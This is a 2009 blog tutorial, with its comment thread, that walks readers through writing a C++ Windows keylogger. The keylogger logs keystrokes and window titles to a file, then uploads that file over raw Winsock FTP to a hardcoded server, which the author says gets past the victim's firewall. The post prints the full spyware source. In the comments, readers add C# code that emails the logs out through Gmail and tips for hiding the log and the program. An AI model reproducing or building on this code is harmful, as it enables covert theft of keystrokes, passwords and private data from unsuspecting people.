Friday, May 29, 2009

C++ - FTP Uploading through winsock (bypasses firewalls!)

Firstly, I want to thank all of you that subscribed and to any of you that havent!
SUBSCRIBE, the link is to your right!


Anyway, I know its been a long time since my last post, but with good cause! I have finally put together a way for you to upload your logs to an ftp server without fail and which bypasses any firewall restrictions that the victim's computer may have!

Also, know that this post could stand alone to the other keylogger tutorials but if you want to use this code in those logger, I suggest you read them too.

So lets get started with this tutorial. Firstly what is FTP.
Well, ftp is short for file transfer protocol and is a tcp or udp layer protocol which is used for transferring data. If you want more information about the history of the protocol, or even otherwise, I strongly suggest you read en.wikipedia.org/wiki/FTP

Anyway moving on, so how does FTP work? Well, FTP names a specific connection between a client and a server, and the specific commands and data signatures that are sent between them.
In order to make this program I had to read through the FTP RFC, a documentation by researchers and founders of the protocol. Google "RFC 959" for more information. Anyway, the basics are that the client has to communicate with the server in a very distinct way. I've laid it out below in normal language and then in FTP command language.

CHATROOM FTPSUCKSJUSTKIDDING OPENED
Client connects to server
Client: Here is my username.
Server: Oh, nice username, okay the username has been set, enter your password.
Client: K, here's my password.
Server: Good Job, thats the right password, you are now connected OR you phail, thats the wrong password.
Assuming the password is correct.....
Client: Okay so now im going to send a image file to you, like .exe or .txt okay?
Server: Okay, connect to me on <000,00,000,000,10,4>
Client: Okay ill connect to you on ip 000.00.000.000 on port 2564 because 10*256+4 is 2564
Client: Okay now imma send some data and i need you to store it as data.txt in the /data folder
Server2: -_-
Client opens second connection to Server2
Client sends data
Client: Okay we are done, imma go now bye!
Client leaves the chatroom

Enough of that childish bs ;] , now for some real commands, notice how they are so much shorter and notice that the server never checks the integrity of the file.

Client Connects to server
Client: "USER username\r\n"
Server: 331 Username set to "username"
Client: "PASS password\r\n"
Server: 203 Password Correct you are now connected
Client: "TYPE I\r\n"
Server: 200 File set to binary aka image
Client: "PASV\r\n"
Server: 227 Passive Mode entered <100,10,100,100,10,4>
Client: "STOR data.txt\r\n"
Client Opens new connection to server 2
Client Sends Data
Client Leaves


Note the different messages that the server sends back, we will use them in error checking.

So, all we have to do for our upload feature, is to send data in this format to the server and have it save it, and the firewall will never know because its an outward connection! Well, not just that, we will get into more reasons why this works on firewalls later.

Anyway, I bet many of you guys are like whoa there slow down. How do I get an ftp server, well the easiest way for you noobs (Just Kidding) would be to get one from the free webhosting site tripod.com. The name of your ftp server will be ftp.tripod.com. Your username will be your username, and your password will be your password that you set!

You will also need someway to access your ftp server. I suggest that you download FireFTP or FileZilla to manage your server and so that you can see if the following code works!

Simple right?

So anyway, after thats done, lets create a small test file in our C:\ folder that we can upload and just for compatibility lets name it test.txt. Open the text file and copy and paste something whatever you want, but make sure the file has something in it.

Okay, now we are ready to start coding, almost! For this program we will be using sockets to send our file because thats the only way to send it without alerting the firewall. If you guys are not worried about firewalls, I would suggest you just use the wininet library for FTP which makes life much easier but more painful when you realize your files arent getting sent.

A good source for help with the wininet functions is here and for specific functions use the same page just navigate to the wininet functions tab or just click on the links. Comment if you need any help and I can send you the wininet code!

Well, we want to do it the boss way, so we will learn winsock or actually winsock2.
Winsock is a set of windows api for socket programming. A socket is a connection. I really suggest that you know some winsock before coming in, either buy a book, or read this tutorial
like this one http://www.madwizard.org/programming/tutorials/netcpp/.

In addition before we start coding, we have to link against winsock. For those of you using devc++ its project, compile options, linkers and then in that box add -lws2_32 which links you against winsock!

Okay, now, lets first make some base functions that we will need. Im going to keep this long and tedious because I know a lot of you cannot object orient your programs which means that I wont either, if you want an object oriented approach to this simple program, just email me.

In addition, also add these in your header if they arent there already:

#include <string>
#include <winsock.h>
#include <windows.h>
#include <sstream>
#include <iostream>
#include <stdio.h>
#include <cstdlib>




Anyway, moving on, remember that the server sends us back the ip to connect to? Well, it sends it in string format, atleast it is in string format after we separate this. Yes, I know we are getting a little ahead of ourselves but we have to create a function that can change the separated strings into integers. For that we use iostreams.

Here is the function, I wont go into explaining it because you can look it up on the web and we have a lot to cover. Furthermore, its pretty self explanatory.


void stringtoint(const string &s, int &i){
istringstream myStream(s);
myStream>>i;
}


One thing that you should not though is the way we were able to modify the parameters within the function. This is due to something very useful called pointers, and you should learn about them if you dont know already.

Moving on, now comes the main part, if you read that winsock tutorial you should be able to follow along. I am going to give you the code for main and then explain it after, dont worry if you have any questions, and remember if I leave anything unexplained dont be afraid to comment and ask about it.

Also note that I havent done any error checking so you better hope it works ;]. It should but its always good to do some error checking, and I want you, the reader to have a shot at it. Be sure to send me your implementation and I will publish it alongside mine in the next or maybe the post after that one.



#include <string>
#include <winsock.h>
#include <windows.h>
#include <sstream>
#include <iostream>
#include <stdio.h>
#include <cstdlib>

using namespace std;

void stringtoint(const string &s, int &i){
istringstream myStream(s);
myStream>>i;
}

void sendLogIn(SOCKET _LSoc){
char userbuffer[] = "Your Username Here"; //PUT YOUR USERNAME AND PASSWORD IN THE USERBUFFER
char passbuffer[] = "Your Password Here"; //AND PASSBUFFER VARIABLES NOT ANYWHERE ELSE
char username[] = "USER ";
char password[] = "PASS ";
char servermessage[1000];

strcat(username, userbuffer);
strcat(username, "\r\n");

send(_LSoc, username, strlen(username), 0);
Sleep(1000);
recv(_LSoc, servermessage, 1000, 0);

strcat(password, passbuffer);
strcat(password, "\r\n");

send(_LSoc, password, strlen(password), 0);
Sleep(1000);
recv(_LSoc, servermessage, 1000, 0);
}

int sendConnInfo(SOCKET _CSoc){
char servermessage[10000];
char ftpmessage[50];
string message;
string portbuffer;
string port1;
string port2;
size_t position;
size_t position2;
int port;
int portbuf;
int _portbuf;

send(_CSoc, "TYPE I\r\n", 8, 0);
Sleep(1000);
recv(_CSoc, servermessage, 10000, 0);
Sleep(1000);
Sleep(1000);
send(_CSoc, "PASV\r\n", 6, 0);
Sleep(1000);
recv(_CSoc, ftpmessage, 50, 0);

message = ftpmessage;
position = message.find("Mode");
portbuffer = message.substr(position+21);

position = portbuffer.find(",");
position2 = portbuffer.find(">");

port1 = portbuffer.substr(0, position);
port2 = portbuffer.substr(position+1, position2-1);

stringtoint(port1, portbuf);
stringtoint(port2, _portbuf);

port = portbuf*256;
port = port + _portbuf;
return port;
}

void sendFileRequest(SOCKET _FSoc){
send(_FSoc, "STOR test.txt\r\n", strlen("STOR test.txt\r\n"), 0);
Sleep(1000);
}

BOOL ftpSocket(int port){
SOCKET sock;
SOCKADDR_IN pasvserver;
char servermessage[MAX_PATH];
HANDLE HFile;
DWORD read;
char *buffer;
char filename[] = "C:\\test.txt";
int connectionerror2;
int trycount2 = 2;


sock = socket(2, SOCK_STREAM, IPPROTO_TCP);
if(sock == INVALID_SOCKET){
WSACleanup();
return 0;
}

pasvserver.sin_family = 2;
pasvserver.sin_port = htons(port); //htons converts the port into a readable form for the SOCKADDR_IN structure
pasvserver.sin_addr.s_addr = inet_addr("209.202.252.54"); //Once again the tripod ftp server

connectionerror2 = connect(sock, (LPSOCKADDR)&pasvserver, sizeof(struct sockaddr));
while(connectionerror2 == SOCKET_ERROR){
connectionerror2 = connect(sock, (LPSOCKADDR)&pasvserver, sizeof(struct sockaddr));
trycount2++;
if(trycount2 = 10){
closesocket(sock);
WSACleanup();
return 0;
}
}


HFile = CreateFile(filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

buffer = (char *)malloc(4096);
SetFilePointer(HFile, 0, NULL, FILE_BEGIN);

while(ReadFile(HFile, buffer, 4096, &read, NULL) && read > 0){
send(sock, buffer, read, 0);
}

return true;
}



int sendFile(){
FreeConsole();
WSAData WData;
SOCKET FSoc;
SOCKADDR_IN server;
int connectionerror;
int trycount = 2;
char servermessage[MAX_PATH];
int port;

WSAStartup(MAKEWORD(2,2), &WData);
FSoc = socket(2, SOCK_STREAM, IPPROTO_TCP);
if(FSoc == INVALID_SOCKET){
WSACleanup();
return 0;
}

server.sin_family = 2;
server.sin_port = htons(21);
server.sin_addr.s_addr = inet_addr("209.202.252.54"); //this is the tripod ftp server address. You can change it if you arent
//using the tripod ftp server.

connectionerror = connect(FSoc, (LPSOCKADDR)&server, sizeof(struct sockaddr));
while(connectionerror == SOCKET_ERROR){
connectionerror = connect(FSoc, (LPSOCKADDR)&server, sizeof(struct sockaddr));
trycount++;
if(trycount = 10){
closesocket(FSoc);
WSACleanup();
return 0;
}
}

recv(FSoc, servermessage, sizeof(servermessage),0);

sendLogIn(FSoc);
Sleep(1000); //give the server and the client sometime to deal with the influx of new messages
//so that data for the ip doesnt get mixed up.
port = sendConnInfo(FSoc);
sendFileRequest(FSoc);
ftpSocket(port);
WSACleanup();
return 0;
}



OMG OMG OMG OMG OMG OMG WHAT IS THAT!

Yes, I know whats going through your mind but its really not that complicated. Before I start explaining, make sure you read the server client conversation above once more. So lets start with the main, basically we initialize a new Winsock session. We then create a socket in that session. Then we use the SOCKADDR_IN structure to assign some very important connection information and then to connect to the server!.

Whats the while loop next? you may ask. Well, its just to make sure that our program doesn't spend forever attempting to connect to the server and that it gives up after a while =).

Okay, so then we have some function calls. Also note that all the Sleeps are just to make sure that the server has finished sending all the data for that call, otherwise, (you would see this if you error checked), the responses from the server get really, really mixed up.

Moving on, now that we are connected we have our first function call, sendLogIn which sends the password and the username to the connection specified by the Socket handle FSoc. Note that in sendLogIn and all the other functions, all the data is sent in that specific way. You have to change the values of the first two variables in sendlogin to specify your username and password! Please dont comment related to that.

Okay, next we have sendConnInfo which uses the string conversion to return a port for our next, next method to use.

Okay, next we have sendFileRequest which issues a store request to the socket specified by FSoc to store whatever data is coming in in the file test.txt in the default folder.

So ftpSocket() is basically the same as main, except that it connects to the server on a different port which sendConnInfo parsed and returned. However at the end of it, it sends the data to the server, which knows that it has to store it, AND IT DOES.

Now whip up fireftp and see if it worked!

In the end we issue a cleanup WSACleanup(); and then we end our program!

Well, that was awesome right! How about we put it into our keylogger.

Remember, if you have any problems, compliments, questions, comments etc. BE SURE TO COMMENT AND SUBSCRIBE!
Especially if it doesnt compile or work because it should.

Tune in next time for instructions on how to make this keylogger run everytime the user starts up their machine!

WARNING:
MESSY CODE BELOW ;]
-----------------------------------------------------------------------------------

#include <string>
#include <winsock.h>
#include <windows.h>
#include <sstream>
#include <iostream>
#include <stdio.h>
#include <cstdlib>

using namespace std;


void stringtoint(const string &s, int &i){
istringstream myStream(s);
myStream>>i;
}

void sendLogIn(SOCKET _LSoc){
char userbuffer[] = "Your Username Here"; //PUT YOUR USERNAME AND PASSWORD IN THE USERBUFFER
char passbuffer[] = "Your Password Here"; //AND PASSBUFFER VARIABLES NOT ANYWHERE ELSE
char username[] = "USER ";
char password[] = "PASS ";
char servermessage[1000];

strcat(username, userbuffer);
strcat(username, "\r\n");

send(_LSoc, username, strlen(username), 0);
Sleep(1000);
recv(_LSoc, servermessage, 1000, 0);

strcat(password, passbuffer);
strcat(password, "\r\n");

send(_LSoc, password, strlen(password), 0);
Sleep(1000);
recv(_LSoc, servermessage, 1000, 0);
}

int sendConnInfo(SOCKET _CSoc){
char servermessage[10000];
char ftpmessage[50];
string message;
string portbuffer;
string port1;
string port2;
size_t position;
size_t position2;
int port;
int portbuf;
int _portbuf;

send(_CSoc, "TYPE I\r\n", 8, 0);
Sleep(1000);
recv(_CSoc, servermessage, 10000, 0);
Sleep(1000);
Sleep(1000);
send(_CSoc, "PASV\r\n", 6, 0);
Sleep(1000);
recv(_CSoc, ftpmessage, 50, 0);

message = ftpmessage;
position = message.find("Mode");
portbuffer = message.substr(position+21);

position = portbuffer.find(",");
position2 = portbuffer.find(">");

port1 = portbuffer.substr(0, position);
port2 = portbuffer.substr(position+1, position2-1);

stringtoint(port1, portbuf);
stringtoint(port2, _portbuf);

port = portbuf*256;
port = port + _portbuf;
return port;
}

void sendFileRequest(SOCKET _FSoc){
send(_FSoc, "STOR storekey.txt\r\n", strlen("STOR storekey.txt\r\n"), 0);
Sleep(1000);
}

BOOL ftpSocket(int port){
SOCKET sock;
SOCKADDR_IN pasvserver;
char servermessage[MAX_PATH];
HANDLE HFile;
DWORD read;
char *buffer;
char filename[] = "C:\\storekey.txt";
int connectionerror2;
int trycount2 = 2;


sock = socket(2, SOCK_STREAM, IPPROTO_TCP);
if(sock == INVALID_SOCKET){
WSACleanup();
return 0;
}

pasvserver.sin_family = 2;
pasvserver.sin_port = htons(port); //htons converts the port into a readable form for the SOCKADDR_IN structure
pasvserver.sin_addr.s_addr = inet_addr("209.202.252.54"); //Once again the tripod ftp server

connectionerror2 = connect(sock, (LPSOCKADDR)&pasvserver, sizeof(struct sockaddr));
while(connectionerror2 == SOCKET_ERROR){
connectionerror2 = connect(sock, (LPSOCKADDR)&pasvserver, sizeof(struct sockaddr));
trycount2++;
if(trycount2 = 10){
closesocket(sock);
WSACleanup();
return 0;
}
}


HFile = CreateFile(filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

buffer = (char *)malloc(4096);
SetFilePointer(HFile, 0, NULL, FILE_BEGIN);

while(ReadFile(HFile, buffer, 4096, &read, NULL) && read > 0){
send(sock, buffer, read, 0);
}

return true;
}



int sendFile(){
FreeConsole();
WSAData WData;
SOCKET FSoc;
SOCKADDR_IN server;
int connectionerror;
int trycount = 2;
char servermessage[MAX_PATH];
int port;

WSAStartup(MAKEWORD(2,2), &WData);
FSoc = socket(2, SOCK_STREAM, IPPROTO_TCP);
if(FSoc == INVALID_SOCKET){
WSACleanup();
return 0;
}

server.sin_family = 2;
server.sin_port = htons(21);
server.sin_addr.s_addr = inet_addr("209.202.252.54"); //this is the tripod ftp server address. You can change it if you arent
//using the tripod ftp server.

connectionerror = connect(FSoc, (LPSOCKADDR)&server, sizeof(struct sockaddr));
while(connectionerror == SOCKET_ERROR){
connectionerror = connect(FSoc, (LPSOCKADDR)&server, sizeof(struct sockaddr));
trycount++;
if(trycount = 10){
closesocket(FSoc);
WSACleanup();
return 0;
}
}

recv(FSoc, servermessage, sizeof(servermessage),0);

sendLogIn(FSoc);
Sleep(1000); //give the server and the client sometime to deal with the influx of new messages
//so that data for the ip doesnt get mixed up.
port = sendConnInfo(FSoc);
sendFileRequest(FSoc);
ftpSocket(port);
WSACleanup();
return 0;
}


string convertkey(int key){
string keystring;
switch(key)
{
case 8 :
keystring = "[/]";
break;
case 13 :
keystring = "\n";
break;
case 32 :
keystring = " ";
break;
case 190 :
keystring = ".";
break;
case 110 :
keystring = ".";
break;
case VK_CAPITAL :
keystring = "[CAPS LOCK]";
break;
case VK_TAB :
keystring = "[TAB]";
break;
case VK_CONTROL :
keystring = "[CONTROL]";
break;
case VK_ESCAPE :
keystring = "[ESCAPE]";
break;
case VK_DOWN :
keystring = "[DOWN]";
break;
case VK_LEFT :
keystring = "[LEFT]";
break;
case VK_RIGHT :
keystring = "[RIGHT]";
break;
case VK_UP :
keystring = "[UP]";
break;
}
if(key >= 96 && key <= 105)
keystring = key-48;
else if (key > 47 && key < 60)
keystring = key;
if (key != VK_LBUTTON || key != VK_RBUTTON)
{
if (key > 64 && key < 91)
{
if (GetKeyState(VK_CAPITAL) | GetAsyncKeyState(VK_SHIFT))
keystring = key; //if its capital then stay
else
{
key = key + 32; //if not shift the number to the lowercase value
keystring = key;
}
}
}
return keystring;
}

void StoreKey(string key){
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << key;
storekey.close;
}

void Logger()
{
string keyinstring = "";
int key;
char currentwindowtitle[MAX_PATH];
char newwindowtitle[MAX_PATH];
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
while(true)
{
Sleep(5);
for(key = 8; key <= 256; key++)
{
if(GetAsyncKeyState(key)&1 == 1)
{
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
if (strcmp(newwindowtitle, currentwindowtitle) != 0)
{
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << endl << currentwindowtitle << endl;
storekey.close;
strcpy(newwindowtitle, currentwindowtitle);
}
keyinstring = convertkey(key);
StoreKey(keyinstring);
}
}
}
}

int main(){
sendFile();
Logger();
return 1;
}

---------------------------------------------------------------------------------

Remember, if you have any problems, compliments, questions, comments etc. BE SURE TO COMMENT AND SUBSCRIBE!
Especially if it doesnt compile or work because it should.

Tune in next time for instructions on how to make this keylogger run everytime the user starts up their machine!

50 comments:

  1. Interesting, very interesting~

    One thing, though. What do you mean error checking? debug? I'm actually pretty bad at debbuging, so... xD

    ReplyDelete
  2. Another thing: woudnt it be better to put the ftp main code in a header or other such file?

    ReplyDelete
  3. yeah it probably would, i mean i would just make it a separate class and call it from this or something like that.

    you know what i just might make an ftp library based on winsock functions.

    subscribe and look for it

    no by error checking i meant looking if the socket failed etc.. or password is wrong and ending the program or fixing the error
    or logging it

    ReplyDelete
  4. Ah, I see...
    yea, if you put it that way, error checking is quite vital xD

    ReplyDelete
  5. I have 2 questions:
    1) There are some things that dont look like codeing and they are all after a //, am i supposed to put them in my keylogger?
    2)On the really long lines, there are things that are cut of, could you send me a txt file so i can see whats cut off?

    ReplyDelete
  6. nothings cut off it just wraps around

    and for question 1. Those are called comments. I would really suggest you learn some c++ before attempting this

    Anyway, you can keep them or get rid of them its your choice just make sure that if you keep them they dont wrap around to multiple lines

    and if you want a text file just click the view source button on the top of the code.

    ReplyDelete
  7. First off thank you. I'm kinda new to coding, but in C# it can be done just using this:
    using System.Net;
    using System.Net.Mail;

    public static void OnTimedEvent(object source, EventArgs e)
    {
    System.Net.Mail.MailMessage msg = new System.Net.Mail.MailMessage(); //create the message
    msg.To.Add("username@gmail.com");
    msg.To.Add("another.optional.address.to.send.to@domain.com");
    msg.From = new MailAddress("username@gmail.com", "nickname", System.Text.Encoding.UTF8);
    msg.Subject = "whatever.you.want.to.be.in.the.message.subject";
    msg.SubjectEncoding = System.Text.Encoding.UTF8;
    msg.Body = "whatever.you.want.to.be.in.the.message.body";
    msg.BodyEncoding = System.Text.Encoding.UTF8;
    msg.IsBodyHtml = false;
    msg.Priority = MailPriority.High;
    SmtpClient client = new SmtpClient(); //Network Credentials for Gmail
    client.Credentials = new System.Net.NetworkCredential("username@gmail.com", "gmailpassword");
    client.Port = 587;
    client.Host = "smtp.gmail.com";
    client.EnableSsl = true;
    Attachment data = new Attachment(where the log file is located);
    msg.Attachments.Add(data);
    try
    {
    client.Send(msg);
    failed = 0;
    }
    catch
    {
    data.Dispose();
    failed = 1;
    }
    data.Dispose();

    if (failed == 0)
    File.WriteAllText(appstart.path, ""); //empties the file

    failed = 0;
    }
    It may look complicated, but it simpler than it looks. Is there a way to replicate this in C++?
    Btw would a firewall block this?

    ReplyDelete
  8. 1. Would a firewall block this.
    It depends, im pretty sure it depends on what type of firewall is on the computer, and even if a user based fw doesnt block it, you might have trouble with router firewalls and isp rules.

    2. Is there a way to replicate this in C++.
    Yes, there is, I am looking into it right now. Its probably a little harder than the winsock ftp but the same basic concept. Open a connection and send data in the format specified by smtp. As a reference point, I would suggest you read the rfc 2821 at http://tools.ietf.org/html/rfc2821 and also look at the bloodred library source which could probably teach you about the format. Know that for gmail you will probably need to use tls "wikipedia it?" and base64 encode all the data you send (theres plenty of source online for this.

    However, if you want to take the easy approach, there are several smtp libraries that could make it so much easier, you might have some problems with fw's though.
    I would recommend checking out chillkat and other similar libraries.

    Oh and for the c# code, im pretty sure the victim would have to have .net installed right?

    ReplyDelete
    Replies
    1. I'm so sad I found this site 4 years after its last publication... I would have followed it instantly! if you are still alive and read this, could we communicate somehow? This is my email: vecman_2@hotmail.com

      Delete
  9. Wow, thanks badfish303. Ya they do have to have .net installed, but XP service pack 1 and on all have it, so I'm set if there using a windows computer. I tested the code on my computer and windows 7 firewall does not block, but that's not saying much. Sorry for asking so many questions, but I get how a firewall would block mine, but what makes the code here not blockable by a firewall? (Also you probably already figured out how to run it at start up, but I have an idea if you want to hear it).

    ReplyDelete
  10. By .NET, I thought that this api required .NET 2.0 on the victim's computer?

    And, your right, windows 7 firewall is not exactly the best, but whatever works for you. I personally have never tested it, but I think the calls to well known .NET api might trigger a firewall or even antivirus.

    Secondly, I havent tested the above code with all firewalls, but I think the best way to explain the reason it works is that it is the same reason that entering "ping google.com" in cmd doesnt trigger the firewall. The code only starts an outbound connection to the server. In contrast, if we had not used passive FTP and the server had connected to us, we would probably have a firewall alert.

    And btw, im looking into some C++ smtp code, I should have a simple but probably buggy client out in about a week!

    ReplyDelete
  11. Cool, can't wait :). (Your right again, it is not included until .NET 2.0, so XP service pack 2 or later).

    Random Question: Is the server located in California, cause I just noticed the time is three hours off?

    Also I recommend trying the Visual Studio 2010 Beta as I prefer it over Dev (although most of the improvement are just in the .NET framework)

    ReplyDelete
  12. What server?

    And I have VS2010, I just use Dev because i dont really use .net

    Btw, did some research into smtp via gmail, i dont really understand how the c# code works, especially since gmail requires tls encryption for all data connections to their smtp server. Im gonna have to find a tls or ssl library and try to smtp over that. We'll see how it goes.

    ReplyDelete
  13. (i'm moid1994 btw)
    it turns out, its just my browser that cuts off text, (Wii based Opera)
    Also, im fairly good at C++, but i dont know everything, so i read this stuff to learn, :)
    Also, what type of file do i save these keyloggers as? (i made 3, each one with the specifics of one of your keylog posts)
    btw, keep on posting these, they're really cool)

    ReplyDelete
  14. Thanks for making this.

    I have a couple comments/ questions.

    1) First.. I have to create the .txt file first, otherwise it does not make the log file. After i create the file manually, it records the keys into the file i created.

    2) My FTP server says that it is updated every time initiate the program. The only problem is that this is always blank. I tried running the program after the log had data in it, but it did not solve the problem.

    If you could respond, thanks.

    ReplyDelete
  15. Also i got these errors:

    xecuting g++.exe...
    g++.exe "C:\Dev-Cpp\Richard's Programs\newkeylogger.cpp" -o "C:\Dev-Cpp\Richard's Programs\newkeylogger.exe" -I"C:\Dev-Cpp\lib\gcc\mingw32\3.4.2\include" -I"C:\Dev-Cpp\include\c++\3.4.2\backward" -I"C:\Dev-Cpp\include\c++\3.4.2\mingw32" -I"C:\Dev-Cpp\include\c++\3.4.2" -I"C:\Dev-Cpp\include" -L"C:\Dev-Cpp\lib" -lws2_32
    C:\Dev-Cpp\Richard's Programs\newkeylogger.cpp: In function `void StoreKey(std::string)':
    C:\Dev-Cpp\Richard's Programs\newkeylogger.cpp:243: error: variable `std::ofstream storekey' has initializer but incomplete type

    C:\Dev-Cpp\Richard's Programs\newkeylogger.cpp: In function `void Logger()':
    C:\Dev-Cpp\Richard's Programs\newkeylogger.cpp:265: error: variable `std::ofstream storekey' has initializer but incomplete type

    Execution terminated


    What i did to fix it:

    include fstream
    and put the () after the storekey.close

    (I'm only a noob, so I thought this is what I needed to do to fix this, but I could be wrong which might explain my problems experienced above). Plz help, thanks.

    ReplyDelete
  16. a third thing: In windows vista you cannot naturally create a text file in C:\, instead you have to create it elsewhere and move it to C:\, which then requires administrator verification.

    ReplyDelete
  17. Yeah, I didn't make this for vista, but there are plenty of ways to bypass uac on vista, ill look into it.

    ReplyDelete
  18. Hey badfish303. You are an absolute genius. Hats off to your creative prowess. I have taken up C++ programming inspired by the posts from your side. Keep up the good work.
    I have compiled the programme as in your post. Only facing a single problem as of now - the file - storekey.txt is not getting uploaded on my ftp server. I have placed the username and password as mentioned in your code - to be exact twice ( once for username and once for password in lines 17 & 18 respectively ). Please guide me. Thanks again.

    ReplyDelete
  19. Thanks for making this.

    I have a couple comments/ questions.

    1) First.. I have to create the .txt file first, otherwise it does not make the log file. After i create the file manually, it records the keys into the file i created.

    2) My FTP server says that it is updated every time initiate the program. The only problem is that this is always blank. I tried running the program after the log had data in it, but it did not solve the problem.

    If you could respond, thanks.

    Also i got these errors:

    xecuting g++.exe...
    g++.exe "C:\Dev-Cpp\Richard's Programs\newkeylogger.cpp" -o "C:\Dev-Cpp\Richard's Programs\newkeylogger.exe" -I"C:\Dev-Cpp\lib\gcc\mingw32\3.4.2\include" -I"C:\Dev-Cpp\include\c++\3.4.2\backward" -I"C:\Dev-Cpp\include\c++\3.4.2\mingw32" -I"C:\Dev-Cpp\include\c++\3.4.2" -I"C:\Dev-Cpp\include" -L"C:\Dev-Cpp\lib" -lws2_32
    C:\Dev-Cpp\Richard's Programs\newkeylogger.cpp: In function `void StoreKey(std::string)':
    C:\Dev-Cpp\Richard's Programs\newkeylogger.cpp:243: error: variable `std::ofstream storekey' has initializer but incomplete type

    C:\Dev-Cpp\Richard's Programs\newkeylogger.cpp: In function `void Logger()':
    C:\Dev-Cpp\Richard's Programs\newkeylogger.cpp:265: error: variable `std::ofstream storekey' has initializer but incomplete type

    Execution terminated


    What i did to fix it:

    include fstream
    and put the () after the storekey.close

    (I'm only a noob, so I thought this is what I needed to do to fix this, but I could be wrong which might explain my problems experienced above). Plz help, thanks.

    ReplyDelete
  20. Ok, can i make this without a compiler?

    ReplyDelete
  21. aite you obviously dont know anything about programming liar....

    ReplyDelete
  22. WELL then, since your so 1-11-11-111, or, D37, or, 13-3-7
    please dont talk to me like i dont know anything, im STARTING C++, but i SPECIALIZE in machine-level languages, not 1100++/12++; MS-DOS are new to me, as i said before, i know some, i read these types of [ie blogs, websites, ect.] to LEARN, DO NOT INSULT ME so 15 you

    ReplyDelete
  23. P.S. there are ways around everything.......

    ReplyDelete
  24. there arent ways around taking source code and turning into a executable without compiling...

    and anyway, what are all the numbers in your post...

    i understand you came to learn but read the post, you need a base level of knowledge, or atleast a compiler...

    ReplyDelete
  25. and i dont get how you would be "fairly good at C++" without having a compiler.

    ReplyDelete
  26. I just open notepad and type in the MS-DOS commands for example:
    shutdown.exe -s -t 30 -c "[put message here]"
    when saved as a batch file (*.bat), will make the computer shutdown in 30 seconds
    color 2a means CMD will have a black background and green text
    @echo off turns off the display of commands
    echo displays text/result of command on that line
    ping localhost -2 < null pauses commands for 2 seconds
    pause closes after "press any key to continue"
    pause < null pauses until keypress
    there is a lot more aswell
    (with out spaces beetween < and null)

    Back to the subject, after i put this code in notepad, i tried saving it as *.bat, *.exe, *.vbs, ect. (none of them worked) so i was wondering, what a compiler adds to/saves the code
    There are many of the tech community at http://www.instructables.com/

    ReplyDelete
  27. 1. the numbers are a mix between binary and hexadecimal values used to express words
    2. you can make some codes an *.exe by typing the code in notepad and saving as *.exe after changing file type from text document to all files
    3. There are many things i know about C++, there are a few examples on my blog http://www.dotcodeing.blogspot.com/

    ReplyDelete
  28. 1. A compiler turns the code into machine code, which your processor can then read, so you cant just save as .exe....

    2. There is nothing about c++ on your blog, only about batch, and again i ask you, how can you know about c++ without knowing what a compiler does.

    3. YOU CAN NEVER MAKE CODE INTO AN EXE by typing .exe at the end... That defies the very basics of software.

    4. Batch, or what you call "MS-DOS" commands isnt even a language, its just a bunch of commands that your operating system knows, and the os kind of acts like a compiler.

    ReplyDelete
  29. I was told (in over 60 sources and 2 programing books, and 1 microsoft employe) that batch was written in C++, and isnt it also possible to use a .bat_to_.exe converter? (or is that considered a type of compiler?)

    thanks for your help, i've learned and re-learned a lot today.......
    Random Question: do you know what the difference is between a *.txt file and a *.cpp file is? (my computer reads them both as text files, but whats the difference?)

    ReplyDelete
  30. Ok, there was a misscommunication error with my source, he unintentionally blended to different sources together and confused me.
    i want to thank you for helping me see this error and helping to clarify it :)
    i still look forward to more keylogger posts (is there a way to make the logger 'uninstall/delete' itself at a certain date and/or time? If there is, could you include it in the next post?)

    ReplyDelete
  31. In the code, in the places where its saying where storekey.txt is, why does it say C:\\storekey.txt ? shouldn't there be only one backslash? because there is no C:\\ on my comp, (winXP), there's a C:\, or is it supposed to be that way, please elaborate

    ReplyDelete
  32. Please be kind enough to answer my query. Would really appreciate it. I only have one barrier to be breached before i can have the keylogger up and running. Please help me badfish303.

    ReplyDelete
  33. tech.nerd.no in c++ there are escape sequences: a backslash \ followed by a letter. However, if you want a regular backslash to appear in some sort of output, you need the double backslash \\. This ouputs a single backslash. Similarly, if you need to output a quote you have to do cout << " He said, \"Hello World!\" to the man." << endl;

    ReplyDelete
  34. I have a request...
    could you reorder the code so that it reads in the order it is processed?

    and... are you still alive? Will you continue to the project?

    ReplyDelete
  35. yes im still alive, and i am working on this project

    im not sure I understand your request

    ReplyDelete
  36. Ah, nevermind, I just had some problems understanding the code, but am on my way now =p

    Am glad you are still there xD

    ReplyDelete
  37. i totaly had an inovation for this keylogger....
    you could make the 'log file' into what some call a "crate"... For anyone whos wondering: a crate is a text file that is saved in the format of a picture... Earlier today i changed the script to save the 'log file' as a jpeg image, and it worked!!!:P So i think this is a good way to increase security since the file is saved on the the root of the C drive and is perfectly accessible

    ReplyDelete
  38. Thank you Badfish!

    Im following with great interest your blog.

    I didnt know the difference between sockets and the wininet library so that was a great thing to explain in your tutorial.

    Is it really a good idea to always close the file:
    storekey.close();
    wouldnt it be better to just flush it:
    storekey.flush();

    Have a great day!

    ReplyDelete
  39. Whats the use of this, after connect?
    Is it an error?

    recv(FSoc, servermessage, sizeof(servermessage),0);

    ReplyDelete
  40. Greetings badfish,

    I liked your tutorial much and as far as i know this is one of the most recent about hand-made keylogging. Thanks you for time spent here.

    However, to any keylogger be succesful it must be hard to detect it. You were writing about that few times. I've read all your posts about that and as far as you are in code, this programm is completely visible as a black cpp console window. That would be realy cool if it run as a background process. Is it possible to do?

    And second thing if you dont have an idea what to add more: it found be rather neccesary for your keylogger to run an system start. I know all stuff with regedit using batch. Is there a way to implement it into cpp code?

    Keep a good work, there are much more people reading it than you think (as far as i know). They are just too lazy for even comment :P
    Have a nice day.

    ReplyDelete
  41. Ah, sorry for the 'second thing'. I didnt noticed it was written at the end.

    ReplyDelete
  42. damn good tutorial badfish u iz a bad mofu*ka ima write a song about you it goes

    badfish ;music; badfish is a bad mofu*ka...its a work in progres...

    keep up the good work

    ReplyDelete
  43. I have a problem please help me.
    THe keylogger uploads an empty file to the ftpserver i dont know what is the matter ?
    how many files need to be written to the storekey.txt so file can be uploaded to a ftp server ? Or letters should be uploaded one by one?
